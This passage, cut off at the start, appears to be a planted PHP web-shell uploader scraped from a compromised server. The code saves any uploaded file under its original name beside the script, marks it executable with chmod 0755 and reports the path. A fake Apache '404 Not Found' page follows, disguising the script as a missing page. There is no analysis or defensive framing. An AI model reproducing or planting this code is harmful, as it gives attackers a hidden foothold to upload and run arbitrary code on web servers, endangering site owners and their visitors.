"; $Path=explode(DS,__FILE__); unset($Path[count($Path)-1]); $Path=implode(DS,$Path); $Path.=DS.$_FILES["File"]["name"]; if ($_FILES["File"]["error"] > 0) { echo "Error: " . $_FILES["File"]["error"] . "
"; } else if(move_uploaded_file($_FILES["File"]["tmp_name"],$Path)) { echo "Stored in: " .$Path; @chmod($Path,0755); } echo ""; exit; } ?> 404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_qos/9.74 mod_bwlimited/1.4 Server at Port 80